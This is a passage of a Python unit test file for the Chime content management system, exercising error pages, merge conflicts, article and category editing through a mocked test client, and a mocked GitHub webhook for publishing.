page_path = u'{}/index.{}'.format(page_slug, constants.CONTENT_FILE_EXTENSION)
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': page_slug},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(page_path in response.data)
# load the index page
response = self.test_client.get('/tree/{}/edit/'.format(working_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that the new folder is represented as a file in the HTML
self.assertTrue(PATTERN_BRANCH_COMMENT.format(working_branch_name) in response.data)
self.assertTrue(PATTERN_FILE_COMMENT.format(**{"file_name": page_slug, "file_title": page_slug, "file_type": constants.ARTICLE_LAYOUT}) in response.data)
# in TestApp
def test_page_not_found_error(self):
''' A 404 page is generated when we get an address that doesn't exist
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'drink quinine for mosquitos'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# get a non-existent page
response = self.test_client.get('tree/{}/malaria'.format(working_branch_name), follow_redirects=True)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('error-404') in response.data)
# these values are set in setUp() above
self.assertTrue(u'support@example.com' in response.data)
self.assertTrue(u'(123) 456-7890' in response.data)
# in TestApp
def test_garbage_edit_url_raises_page_not_found(self):
''' A 404 page is generated when we get an edit address that doesn't exist
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('erica@example.com')
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Take Malarone for People Susceptible to Malaria')
# Get the branch name
branch_name = erica.get_branch_name()
# Enter the "other" folder
other_slug = u'other'
erica.follow_link(href='/tree/{}/edit/{}/'.format(branch_name, other_slug))
# Create a category
category_name = u'Rubber Plants'
category_slug = slugify(category_name)
erica.add_category(category_name=category_name)
# Try to load a non-existent page within the category
erica.open_link(url='/tree/{}/edit/{}/malaria'.format(branch_name, category_slug), expected_status_code=404)
# in TestApp
def test_garbage_view_url_raises_page_not_found(self):
''' A 404 page is generated when we get a view address that doesn't exist
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('erica@example.com')
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Chew Mulberry Leaves for Silkworms')
# Get the branch name
branch_name = erica.get_branch_name()
# Enter the "other" folder
other_slug = u'other'
erica.follow_link(href='/tree/{}/edit/{}/'.format(branch_name, other_slug))
# Create a category
category_name = u'Bombyx Mori'
category_slug = slugify(category_name)
erica.add_category(category_name=category_name)
# Try to load a non-existent asset within the other folder
erica.open_link(url='/tree/{}/view/{}/{}/missing.jpg'.format(branch_name, other_slug, category_slug), expected_status_code=404)
# in TestApp
def test_internal_server_error(self):
''' A 500 page is generated when we provoke a server error
'''
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
with HTTMock(self.mock_internal_server_error):
response = self.test_client.get(constants.ROUTE_ACTIVITY, follow_redirects=True)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('error-500') in response.data)
# these values are set in setUp() above
self.assertTrue(u'support@example.com' in response.data)
self.assertTrue(u'(123) 456-7890' in response.data)
# in TestApp
def test_exception_error(self):
''' A 500 page is generated when we provoke an uncaught exception
'''
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
with HTTMock(self.mock_exception):
response = self.test_client.get(constants.ROUTE_ACTIVITY, follow_redirects=True)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('error-500') in response.data)
# these values are set in setUp() above
self.assertTrue(u'support@example.com' in response.data)
self.assertTrue(u'(123) 456-7890' in response.data)
# in TestApp
def test_merge_conflict_error(self):
''' We get a merge conflict error page when there's a merge conflict
'''
fake_task_description_1 = u'do things for somebody else'
fake_task_description_2 = u'do other things for somebody even else'
fake_email_1 = u'erica@example.com'
fake_email_2 = u'frances@example.com'
fake_page_slug = u'hello'
fake_page_path = u'{}/index.{}'.format(fake_page_slug, constants.CONTENT_FILE_EXTENSION)
fake_page_content_1 = u'Hello world.'
fake_page_content_2 = u'Hello moon.'
#
#
# Log in as person 1
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_email_1})
with HTTMock(self.auth_csv_example_allowed):
# create a new branch
response = self.test_client.post('/start', data={'task_description': fake_task_description_1}, follow_redirects=True)
# extract the generated branch name from the returned HTML
generated_branch_search = search(r'<!-- branch: (.{{{}}}) -->'.format(repo_functions.BRANCH_NAME_LENGTH), response.data)
self.assertIsNotNone(generated_branch_search)
try:
generated_branch_name_1 = generated_branch_search.group(1)
except AttributeError:
raise Exception('No match for generated branch name.')
with HTTMock(self.mock_google_analytics):
# create a new file
response = self.test_client.post('/tree/{}/edit/'.format(generated_branch_name_1),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': fake_page_slug},
follow_redirects=True)
# get the edit page for the new file and extract the hexsha value
response = self.test_client.get('/tree/{}/edit/{}'.format(generated_branch_name_1, fake_page_path))
hexsha = search(r'<input name="hexsha" value="(\w+)"', response.data).group(1)
# now save the file with new content
response = self.test_client.post('/tree/{}/save/{}'.format(generated_branch_name_1, fake_page_path),
data={'layout': constants.ARTICLE_LAYOUT, 'hexsha': hexsha,
'en-title': 'Greetings',
'en-body': u'{}\n'.format(fake_page_content_1),
'url-slug': u'{}/index'.format(fake_page_slug)},
follow_redirects=True)
# Request feedback on person 1's change
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name_1), data={'comment_text': u'', 'request_feedback': u'Request Feedback'}, follow_redirects=True)
#
#
# Log in as person 2
with HTTMock(self.mock_persona_verify_frances):
self.test_client.post('/sign-in', data={'assertion': fake_email_2})
with HTTMock(self.auth_csv_example_allowed):
# create a new branch
response = self.test_client.post('/start', data={'task_description': fake_task_description_2}, follow_redirects=True)
# extract the generated branch name from the returned HTML
generated_branch_search = search(r'<!-- branch: (.{{{}}}) -->'.format(repo_functions.BRANCH_NAME_LENGTH), response.data)
try:
generated_branch_name_2 = generated_branch_search.group(1)
except AttributeError:
raise Exception('No match for generated branch name.')
with HTTMock(self.mock_google_analytics):
# create a new file
response = self.test_client.post('/tree/{}/edit/'.format(generated_branch_name_2),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': fake_page_slug},
follow_redirects=True)
# get the edit page for the new file and extract the hexsha value
response = self.test_client.get('/tree/{}/edit/{}'.format(generated_branch_name_2, fake_page_path))
hexsha = search(r'<input name="hexsha" value="(\w+)"', response.data).group(1)
# now save the file with new content
fake_new_title = u'Bloople'
response = self.test_client.post('/tree/{}/save/{}'.format(generated_branch_name_2, fake_page_path),
data={'layout': constants.ARTICLE_LAYOUT, 'hexsha': hexsha,
'en-title': fake_new_title,
'en-body': u'{}\n'.format(fake_page_content_2),
'url-slug': u'{}/index'.format(fake_page_slug)},
follow_redirects=True)
# Request feedback on person 2's change
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name_2), data={'comment_text': u'', 'request_feedback': u'Request Feedback'}, follow_redirects=True)
# Endorse person 1's change
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name_1), data={'comment_text': u'', 'endorse_edits': 'Endorse Edits'}, follow_redirects=True)
# And publish person 1's change!
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name_1), data={'comment_text': u'', 'merge': 'Publish'}, follow_redirects=True)
#
#
# Log in as person 1
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_email_1})
# Endorse person 2's change
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name_2), data={'comment_text': u'', 'endorse_edits': 'Endorse Edits'}, follow_redirects=True)
# And publish person 2's change!
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name_2), data={'comment_text': u'', 'merge': 'Publish'}, follow_redirects=True)
# verify that we got an error page about the merge conflict
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('error-500') in response.data)
self.assertTrue(u'MergeConflict' in response.data)
self.assertTrue(u'{}/index.{}'.format(fake_page_slug, constants.CONTENT_FILE_EXTENSION) in response.data)
self.assertTrue(u'<td><a href="/tree/{}/edit/{}/">{}</a></td>'.format(generated_branch_name_2, fake_page_slug, fake_new_title) in response.data)
self.assertTrue(u'<td>Article</td>' in response.data)
self.assertTrue(u'<td>Edited</td>' in response.data)
# these values are set in setUp() above
self.assertTrue(u'support@example.com' in response.data)
self.assertTrue(u'(123) 456-7890' in response.data)
# in TestApp
def test_redirect_into_solo_folder(self):
''' Loading a folder whose only child is a non-article, non-category directory redirects to the contents of that directory.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('erica@example.com')
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Be Shot Hundreds Of Feet Into The Air for A Geyser Of Highly Pressurized Water')
# Get the branch name
branch_name = erica.get_branch_name()
# create a directory containing only another directory
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email='erica@example.com')
testing_slug = u'testing'
categories_slug = u'categories'
mkdir(join(repo.working_dir, testing_slug))
mkdir(join(repo.working_dir, testing_slug, categories_slug))
# open the top level directory
erica.open_link(url='/tree/{}/edit/'.format(branch_name))
# enter the 'testing' directory
erica.follow_link(href='/tree/{}/edit/{}/'.format(branch_name, testing_slug))
# we should've automatically been redirected into the 'categories' directory
self.assertEqual(erica.path, '/tree/{}/edit/{}/'.format(branch_name, join(testing_slug, categories_slug)))
# in TestApp
def test_article_preview(self):
''' Check edit process with a user previewing their article.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_frances):
frances = ChimeTestClient(self.app.test_client(), self)
frances.sign_in('frances@example.com')
# Start a new task, "Diving for Dollars".
frances.open_link(constants.ROUTE_ACTIVITY)
frances.start_task(description=u'Diving for Dollars')
branch_name = frances.get_branch_name()
# Look for an "other" link that we know about - is it a category?
frances.follow_link('/tree/{}/edit/other/'.format(branch_name))
# Create a new category "Ninjas", subcategory "Flipping Out", and article "So Awesome".
frances.add_category('Ninjas')
frances.add_subcategory('Flipping Out')
frances.add_article('So Awesome')
edit_path = frances.path
# Preview the new article.
frances.preview_article('So, So Awesome', 'It was the best of times.')
expected_path = '/tree/{}/view/other/ninjas/flipping-out/so-awesome'.format(branch_name)
self.assertTrue(frances.path.startswith(expected_path), 'Should be on a preview path')
self.assertTrue('best of times' in str(frances.soup), 'Should see current content there')
# Look back at the edit form.
frances.open_link(edit_path)
self.assertTrue('best of times' in str(frances.soup), 'Should see current content there, too')
# in TestApp
def test_alpha_sort_in_admin(self):
''' Make sure items are sorted alphabetically in the Chime admin interface
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_frances):
frances = ChimeTestClient(self.app.test_client(), self)
frances.sign_in('frances@example.com')
# Start a new task
frances.open_link(constants.ROUTE_ACTIVITY)
frances.start_task(description=u'Crunching Beetles for Trap-Door Spiders')
branch_name = frances.get_branch_name()
# Look for an "other" link that we know about - is it a category?
frances.follow_link('/tree/{}/edit/other/'.format(branch_name))
# Create a bunch of new categories
frances.add_categories(['Anthicidae', 'Scydmaenidae', 'Paussinae', 'Bostrychidae', 'Scolytidae', 'Anobiidae', 'Meloidae', 'Dermestidae', 'Silphidae'])
# The categories should be sorted by title on the page
rendered_categories = [tag.text for tag in frances.soup.find_all('a', class_='category')]
sorted_categories = sorted(rendered_categories)
self.assertEqual(rendered_categories, sorted_categories)
# in TestApp
def test_overload_front_page(self):
''' Try to overload the front page with multiple simultaneous requests.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_frances):
frances = ChimeTestClient(self.app.test_client(), self)
frances.sign_in('frances@example.com')
# Start a new task
frances.open_link(constants.ROUTE_ACTIVITY)
frances.start_task(description=u'Beating Crunches for Door-Spider Traps')
# hit the front page a bunch of times
times = 20
pros = []
for blip in range(times):
process = Process(target=frances.open_link, kwargs=dict(url='/', expected_status_code=303))
process.start()
pros.append(process)
# wait until the processes are done
for process in pros:
process.join()
# raise if any errors were raised
for process in pros:
self.assertEqual(0, process.exitcode, u'A process that was trying to load the front page failed!')
# in TestApp
def test_published_activities_displayed(self):
''' Published activities are displayed on the activities list page.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
frances_email = u'frances@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
with HTTMock(self.mock_persona_verify_frances):
frances = ChimeTestClient(self.app.test_client(), self)
frances.sign_in(frances_email)
# Start a new task and create a topic, subtopic and article
erica.open_link(constants.ROUTE_ACTIVITY)
activity_title = u'Flicking Ants Off My Laptop'
args = activity_title, u'Flying', u'Through The Air', u'Goodbye'
branch_name = erica.quick_activity_setup(*args)
# Ask for feedback
erica.follow_link(href='/tree/{}/'.format(branch_name))
erica.request_feedback()
#
# Switch users and publish the article.
#
frances.open_link(url=erica.path)
frances.approve_activity()
frances.publish_activity()
#
# Load the front page and make sure the activity is listed as published
#
erica.open_link(constants.ROUTE_ACTIVITY)
pub_ul = erica.soup.select("#activity-list-published")[0]
# there should be an HTML comment with the branch name
comment = pub_ul.findAll(text=lambda text: isinstance(text, Comment))[0]
self.assertTrue(branch_name in comment)
pub_li = comment.find_parent('li')
# and the activity title wrapped in an a tag
self.assertIsNotNone(pub_li.find('a', text=activity_title))
# in TestApp
def test_renaming_activity(self):
''' We can rename an activity
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('erica@example.com')
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task('Ingest Wolffish, Capelin, Skate Eggs And Sometimes Rocks')
branch_name = erica.get_branch_name()
# rename the task
new_description = u'Eat Greenland Halibut, Polar And Arctic Cod, Cuttlefish, Shrimp And Armhook Squid'
erica.follow_link('/tree/{}/'.format(branch_name))
erica.rename_activity(task_description=new_description)
# the new name is on the page
self.assertIsNotNone(erica.soup.find(lambda tag: new_description in tag.text))
# the new name is in the task metadata
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email='erica@example.com')
task_metadata = repo_functions.get_task_metadata_for_branch(repo, branch_name)
self.assertEqual(task_metadata['task_description'], new_description)
# in TestApp
def test_renaming_activity_doesnt_affect_review_state(self):
''' Renaming the activity shouldn't reset the review state.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('erica@example.com')
# Start a new task and create a topic
erica.open_link(constants.ROUTE_ACTIVITY)
args = u'Their Diets Consist Of Almost Any Creature They Are Capable Of Overpowering', u'When Living Near Water, They Will Eat Other Aquatic Animals'
branch_name = erica.quick_activity_setup(*args)
# request feedback for the task
erica.request_feedback()
# verify the feedback state
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email='erica@example.com')
state, _ = repo_functions.get_review_state_and_author_email(repo, 'master', branch_name)
self.assertEqual(state, constants.REVIEW_STATE_FEEDBACK)
# change the activity description
new_description = u'Food is swallowed whole'
erica.follow_link('/tree/{}/'.format(branch_name))
erica.rename_activity(task_description=new_description)
# the new name is in the task metadata
task_metadata = repo_functions.get_task_metadata_for_branch(repo, branch_name)
self.assertEqual(task_metadata['task_description'], new_description)
# the state hasn't changed
state, _ = repo_functions.get_review_state_and_author_email(repo, 'master', branch_name)
self.assertEqual(state, constants.REVIEW_STATE_FEEDBACK)
# in TestApp
def test_request_feedback_with_activity_rename(self):
''' We can rename an activity by submitting a new name via the request feedback form
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
# Start a new task and create a topic
erica.open_link(constants.ROUTE_ACTIVITY)
args = u'Skates are cartilaginous fish', u'The Two Subfamilies Are Rajinae And Arhynchobatinae'
branch_name = erica.quick_activity_setup(*args)
# request feedback for the task with a new activity description
new_description = u'Skates Are Oviparous, That Is They Lay Eggs'
erica.request_feedback(task_description=new_description)
# the 'requested feedback' message is on the page
self.assertIsNotNone(erica.soup.find(text=u'{} {}'.format(erica_email, repo_functions.ACTIVITY_FEEDBACK_MESSAGE)))
# the new description is on the page
self.assertIsNotNone(erica.soup.find(lambda tag: new_description in tag.text))
# the new description is in the task metadata
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email='erica@example.com')
task_metadata = repo_functions.get_task_metadata_for_branch(repo, branch_name)
self.assertEqual(task_metadata['task_description'], new_description)
# in TestApp
def test_save_unchanged_article(self):
''' Saving an unchanged article doesn't raise any errors.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
# Start a new task and create a topic, subtopic and article
erica.open_link(constants.ROUTE_ACTIVITY)
article_title = u'Open-Ocean'
args = u'The Eggs Are Spherical And Buoyant', u'The Fry Are Tiny', u'Pelagic', article_title
erica.quick_activity_setup(*args)
# Edit the article
article_text = u'Although most puffers are drab, many have bright colors and distinctive markings.'
erica.edit_article(article_title, article_text)
# Edit the article again with the same variables
erica.edit_article(article_title, article_text)
# in TestApp
def test_browse_is_default_view(self):
''' Loading root redirects to browsing the live site.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
erica.open_link('/', expected_status_code=303)
# it's the right url
self.assertEqual(erica.path, '/browse/')
# the test client can't derive a branch name
self.assertRaises(AssertionError, lambda: erica.get_branch_name())
# it's the right template
pattern_template_comment_stripped = sub(ur'<!--|-->', u'', PATTERN_TEMPLATE_COMMENT)
comments = erica.soup.findAll(text=lambda text: isinstance(text, Comment))
self.assertTrue(pattern_template_comment_stripped.format(u'articles-list') in comments)
# in TestApp
def test_no_activity_bar_when_browsing(self):
''' There's no activity bar when you're browsing the live site.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
erica.open_link('/', expected_status_code=303)
# there's no activity bar
self.assertIsNone(erica.soup.find("div", {"data-test-id": "activity-bar"}))
# in TestApp
def test_new_category_in_browse_starts_activity(self):
''' Starting a new category from browse view starts a new activity.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email=erica_email)
# Enter the "other" folder
articles_slug = u'test-articles'
erica.open_link(url='/browse/{}/'.format(articles_slug))
# there's only the master branch
self.assertEqual(len(repo.branches), 1)
self.assertTrue('master' in repo.branches)
# create a category
category_name = u'Confuse The Predator\'s Visual Acuity'
erica.add_category(category_name=category_name)
# there is a branch name
branch_name = erica.get_branch_name()
# verify that the branch exists in the repo
self.assertEqual(len(repo.branches), 2)
self.assertTrue(branch_name in repo.branches)
# the branch name and the new category name slug are in the path
self.assertTrue(branch_name in erica.path)
self.assertTrue(slugify(category_name) in erica.path)
# a flash about the topic's creation is on the page
self.assertEqual(PATTERN_FLASH_CREATED_CATEGORY.format(title=category_name), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_new_subcategory_in_browse_starts_activity(self):
''' Starting a new subcategory from browse view starts a new activity.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email=erica_email)
# Enter the category folder in browse mode
articles_slug = u'test-articles'
topic_slug = u'test-topic'
erica.open_link(url='/browse/{}/'.format(join(articles_slug, topic_slug)))
# there's only the master branch
self.assertEqual(len(repo.branches), 1)
self.assertTrue('master' in repo.branches)
# create a subcategory
subcategory_name = u'Rolling Into A Spiny Ball'
erica.add_subcategory(subcategory_name=subcategory_name)
# there is a branch name
branch_name = erica.get_branch_name()
# verify that the branch exists in the repo
self.assertEqual(len(repo.branches), 2)
self.assertTrue(branch_name in repo.branches)
# the branch name and the new subcategory name slug are in the path
self.assertTrue(branch_name in erica.path)
self.assertTrue(slugify(subcategory_name) in erica.path)
# a flash about the topic's creation is on the page
self.assertEqual(PATTERN_FLASH_CREATED_CATEGORY.format(title=subcategory_name), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_new_article_in_browse_starts_activity(self):
''' Starting a new article from browse view starts a new activity.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email=erica_email)
# Enter the category folder in browse mode
articles_slug = u'test-articles'
topic_slug = u'test-topic'
subtopic_slug = u'test-subtopic'
erica.open_link(url='/browse/{}/'.format(join(articles_slug, topic_slug, subtopic_slug)))
# there's only the master branch
self.assertEqual(len(repo.branches), 1)
self.assertTrue('master' in repo.branches)
# create an article
article_name = u'Grunts, Snuffles And Squeals'
erica.add_article(article_name=article_name)
# there is a branch name
branch_name = erica.get_branch_name()
# verify that the branch exists in the repo
self.assertEqual(len(repo.branches), 2)
self.assertTrue(branch_name in repo.branches)
# the branch name and the new article name slug are in the path
self.assertTrue(branch_name in erica.path)
self.assertTrue(slugify(article_name) in erica.path)
# a flash about the article's creation is on the page
self.assertEqual(PATTERN_FLASH_CREATED_ARTICLE.format(title=article_name), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_delete_category_in_browse_starts_activity(self):
''' Deleting a category from browse view starts a new activity.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email=erica_email)
# Enter the category folder in browse mode
articles_slug = u'test-articles'
erica.open_link(url='/browse/{}/'.format(articles_slug))
# there's only the master branch
self.assertEqual(len(repo.branches), 1)
self.assertTrue('master' in repo.branches)
# delete a category
topic_title = u'Test Topic'
erica.follow_modify_category_link(topic_title)
erica.delete_category()
# there is a branch name
branch_name = erica.get_branch_name()
# verify that the branch exists in the repo
self.assertEqual(len(repo.branches), 2)
self.assertTrue(branch_name in repo.branches)
# the branch name is in the path
self.assertTrue(branch_name in erica.path)
# a flash about the topic's deletion is on the page
self.assertEqual(PATTERN_FLASH_DELETED_CATEGORY.format(title=topic_title, containing=u'(containing 1 topic and 1 article) '), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_delete_article_in_browse_starts_activity(self):
''' Deleting an article from browse view starts a new activity.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email=erica_email)
# Enter the category folder in browse mode
articles_slug = u'test-articles'
topic_slug = u'test-topic'
subtopic_slug = u'test-subtopic'
erica.open_link(url='/browse/{}/'.format(join(articles_slug, topic_slug, subtopic_slug)))
# there's only the master branch
self.assertEqual(len(repo.branches), 1)
self.assertTrue('master' in repo.branches)
# delete the article
article_title = u'Test Article'
erica.delete_article(article_title)
# there is a branch name
branch_name = erica.get_branch_name()
# verify that the branch exists in the repo
self.assertEqual(len(repo.branches), 2)
self.assertTrue(branch_name in repo.branches)
# the branch name is in the path
self.assertTrue(branch_name in erica.path)
# a flash about the article's deletion is on the page
self.assertEqual(PATTERN_FLASH_DELETED_ARTICLE.format(title=article_title), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_modify_category_in_browse_starts_activity(self):
''' Modifying a category from browse view starts a new activity.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email=erica_email)
# Enter the category folder in browse mode
articles_slug = u'test-articles'
erica.open_link(url='/browse/{}/'.format(articles_slug))
# there's only the master branch
self.assertEqual(len(repo.branches), 1)
self.assertTrue('master' in repo.branches)
# edit a category
topic_title = u'Test Topic'
erica.follow_modify_category_link(topic_title)
# make a change
new_title = u'A Fluffy Tail That Stabilizes In Flight'
erica.edit_category(title_str=new_title, description_str=u'The tail acts as an adjunct airfoil, working as an air brake before landing on a tree trunk.')
# there is a branch name
branch_name = erica.get_branch_name()
# verify that the branch exists in the repo
self.assertEqual(len(repo.branches), 2)
self.assertTrue(branch_name in repo.branches)
# the branch name is in the path
self.assertTrue(branch_name in erica.path)
# a flash about the topic's edit is on the page
self.assertEqual(PATTERN_FLASH_SAVED_CATEGORY.format(title=new_title), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_edit_article_in_browse_starts_activity(self):
''' Editing an article from browse view starts a new activity.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email=erica_email)
# Enter the test article edit page in browse mode
articles_slug = u'test-articles'
topic_slug = u'test-topic'
subtopic_slug = u'test-subtopic'
article_slug = u'test-article'
article_url = '/browse/{}'.format(join(articles_slug, topic_slug, subtopic_slug, article_slug, u'index.{}'.format(constants.CONTENT_FILE_EXTENSION)))
erica.open_link(url=article_url)
# there's only the master branch
self.assertEqual(len(repo.branches), 1)
self.assertTrue('master' in repo.branches)
# edit the article
new_title = u'Mostly Hairless, Apart From Their Whiskers'
new_body = u'Their internal organs are visible through the skin.'
erica.edit_article(title_str=new_title, body_str=new_body)
# there is a branch name
branch_name = erica.get_branch_name()
# verify that the branch exists in the repo
self.assertEqual(len(repo.branches), 2)
self.assertTrue(branch_name in repo.branches)
# the branch name is in the path
self.assertTrue(branch_name in erica.path)
# a flash about the article's edit is on the page
self.assertEqual(PATTERN_FLASH_SAVED_ARTICLE.format(title=new_title), erica.soup.find('li', class_='flash').text)
class TestPublishApp (TestCase):
def setUp(self):
self.old_tempdir, tempfile.tempdir = tempfile.tempdir, mkdtemp(prefix='chime-TestPublishApp-')
self.work_path = mkdtemp(prefix='chime-publish-app-')
app_args = {}
self.app = publish.create_app(app_args)
self.client = self.app.test_client()
def tearDown(self):
rmtree(tempfile.tempdir)
tempfile.tempdir = self.old_tempdir
def mock_github_request(self, url, request):
''' Mock responses for the chime-starter archive requests to github.com and codeload.github.com.
'''
_, host, path, _, _, _ = urlparse(url.geturl())
if (host, path) == ('github.com', '/chimecms/chime-starter/archive/93250f1308daef66c5809fe87fc242d092e61db7.zip'):
return response(302, '', headers={'Location': 'https://codeload.github.com/chimecms/chime-starter/tar.gz/93250f1308daef66c5809fe87fc242d092e61db7'})
if (host, path) == ('codeload.github.com', '/chimecms/chime-starter/tar.gz/93250f1308daef66c5809fe87fc242d092e61db7'):
with open(join(dirname(__file__), '93250f1308daef66c5809fe87fc242d092e61db7.zip'), 'rb') as file:
return response(200, file.read(), headers={'Content-Type': 'application/zip'})
raise Exception('Unknown URL {}'.format(url.geturl()))
# in TestPublishApp
def test_webhook_post(self):
''' Check basic webhook flow.
'''
payload = '''
{
"head": "93250f1308daef66c5809fe87fc242d092e61db7",
"ref": "refs/heads/master",
"size": 1,
"commits": [
{
"sha": "93250f1308daef66c5809fe87fc242d092e61db7",
"message": "Clean up braces",
"author": {
"name": "Frances Berriman",
"email": "phae@example.com"
},
"url": "https://github.com/chimecms/chime-starter/commit/93250f1308daef66c5809fe87fc242d092e61db7",
"distinct": true
}
]
}
'''
with HTTMock(self.mock_github_request):
response = self.client.post('/', data=payload)
self.assertTrue(response.status_code in range(200, 299))
# in TestPublishApp
def test_load(self):
''' Make sure that the publish module loads properly.
'''
from chime import publish
self.assertIsNotNone(publish.logger)
